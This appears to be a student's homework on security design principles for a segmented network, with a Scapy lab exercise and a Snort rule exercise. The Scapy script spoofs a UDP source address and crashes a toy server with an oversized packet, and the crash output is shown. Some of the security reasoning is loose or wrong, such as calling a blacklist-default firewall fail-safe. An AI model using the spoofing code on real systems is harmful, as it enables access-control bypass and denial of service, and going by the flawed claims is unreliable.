# SS HW 2 ## 1  ### Simplicity The network is segmented in to different VLANs to simplify the overall design. Each segment performs a specific function to ease manageability and simplify access control. No 2 ### Open Design The network designed in this network diagram is openly accepted and practiced by many organization. By using this design will ensure robustness and security. Any addition of functions can be added modularly, which makes it such that it is open design. ### Compartementalisation In the diagram, the server and users are isolated in to different vlans based on their functions and work scope. Different functions are run on separate servers to prevent attackers from gaining access to all the functions. Fine grain access control can be implemented to increase security. The web and email servers are located in the DMZ while the application and database servers are located in the Server VLAN. ### Minimum Exposure Exposure to external is minimized by putting only the web and email server in the DMZ zone. The only interface that is connected to the external is the firewall. This makes it such that the only external method of entering the network is through the firewall and since there's a black listing policy on the connection, the exposure is minimised. Web traffic going in and out if the DMZ are encrypted using HTTPS, emails are encrypted using TLS1.2 and other apps and database are further behind an internal firewall. Minimisation of the exposure will minimise the possible entry of malicious actors by making the entry point limited. ### Least Privilege By compartmentalizing the servers and users with different job scopes in to separate vlans, access to sensitive information can be controlled by both physical and through fine grain access control. Only those users that are authorized to access sensitive information can be allowed to connect to the restricted vlan and only after access are granted. Minimum privileges are given to those application running on web servers and email servers. ### Minimum Trust and Maximum Trustworthiness All the servers, firewalls and other configurations are set to follow the latest industry standard of security. Minimum trust is also applied by segmenting the functions and privileges of different actors in the entity. This should maximise trustworthiness. By default, no access should be and is only granted by permissions from a higher authority. This oeprates on a minimum trust basis in order to protect the entity. ### Secure and Fail-Safe Defaults Firewalls are set up using a blacklist by default approach in order to prevent known and common attacks. In the case of a power outtage or malfunction, this method should also block the communications with the outside world. Likewise for the servers. The servers are installed with anti malware protection that set to reactivate after a crash or reboot. The data that are stored on the servers are encrypted and is accessible only with correct decryption conditions. The traffic for the web server is encrypted using https and for the email server, the traffic is encrypted using TLS1.2. ### Complete Mediation All access to the servers is access controlled. Only those users and application with the correct access are able to access these servers. These accesses are implemented via the Active Directory. ### No Single Point of Failure End user log in requires 2FA authentication. The web and email servers have undergone hardening and all access to are strictly controlled. A firewall is also in place to stop attackers from access these servers. In case the firewall fails, the harden servers will also provide resistance to attack. Data on these servers are encrypted and only accessible with valid key. Load balancing are also setup to enable load sharing between the servers and prevent single point of failure. ### Traceability Audit trail and server logs are enabled on all servers so that any changes made are logged. All access and privileges granted will be review and audited and any server access, successful or unsuccessful login attempt will be logged. Likewise for the firewalls and the switches ### Generating Secrets Strong passwords with at least 16 characters in size are implemented on all the servers and firewall. The combination of alphabet, integers, and special characters should also be implemented. ### Usability The user interfaces are specially designed to be intuitive and simple to use. User access and roles are clearly defined and the users are clearly briefed of their roles and accesses. This will make the system user friendly and easy to use. The overall network system is segmented in to different vlans, with each vlan’s function clearly defined. This will simplify the administration and maintenance. ## 2   Client ``` from scapy.all import * def main(): A = '1.2.3.4' B = '192.168.44.128' s_port = 5005 d_port = 5005 payload = 'General Kenobi.' * 512 spoofed_packet = IP(src=A, dst=B) / UDP(sport=s_port, dport=d_port) / payload send(spoofed_packet) if __name__ == "__main__": main() ```  Server ``` import socket #UDP_IP = '127.0.0.1' UDP_IP = "192.168.44.128" UDP_PORT = 5005 if __name__ == "__main__": print('Starting socket') sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.bind((UDP_IP, UDP_PORT)) sizes = {} for size in range(512): sizes[size] = 0 while True: data, addr = sock.recvfrom(8092) if addr[0] != "1.2.3.4": # on some systems should be addr != … print("Access denied") continue print("length:", len(data)) sizes[len(data)] += 1 ``` To crash the server, a UDP packet that has a length larger than 512 while spoofing the source IP address to be `1.2.3.4`. We need to trigger the `sizes[len(data)] += 1` part of teh code in order to crash the server by causing an exit from teh while loop due to receiving a packet of size larger than 512, which is the upper limit of the predefined sizes dictionary. The following output can be seen: ``` Starting socket length: 7680 Traceback (most recent call last): File "/home/strix/HW2_Qn2_server.py", line 18, in <module> sizes[len(data)] += 1 KeyError: 7680 ``` To fix the errors, the following can be done: 1. Change `sizes[len(data)] += 1` to add new length sizes to the dictionary as key instead of adding 1 to a previously existing key (This will expand the dictionary) 2. Remove root privilege from whatever terminal running the client (without sudo or root privilege the code requires higher perimission)  3. Use TCP instead of UDP. UDP is a simpler, connectionless Internet protocol wherein error-checking and recovery services are not required. According to scapy documentation scapy does not work well with TCP, which is a good thing because we are using scapy to spoof and crash the server. With UDP, there is no overhead for opening a connection, maintaining a connection, or terminating a connection; data is continuously sent to the recipient, whether or not they receive it. TCP has extensive error checking and acknowledgment of data (compared to basic error checking in UDP), in addition to using handshakes such as SYN, ACK, SYN-ACK. Though not as fast, TCP will be more secure instead of UDP. ## 3 Scapy code to send the packets ```python from scapy.all import * import socket def main(): ''' S_IP = 192.168.44.128 D_IP = 192.168.44.129 ''' name_list = ['ivan', 'andy','jiahan', 'gavin', 'guoyang', 'fenglin','david','lucy'] for name in name_list: try: print(name) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) p = IP(dst='192.168.44.129')/UDP()/Raw(load=name) send(p) print('Finished') except Exception as e: raise e if __name__ == '__main__': main() ``` ## Create Rules using snort 1. Install snort `sudo apt-get install snort` 2. Create rules  3. Add rules to snort.conf  ## Testing  ## Procedure 1.  2. `sudo snort -d -l /var/log/snort/ -h 0.0.0.0/24 -A console -c /etc/snort/snort.conf` 3.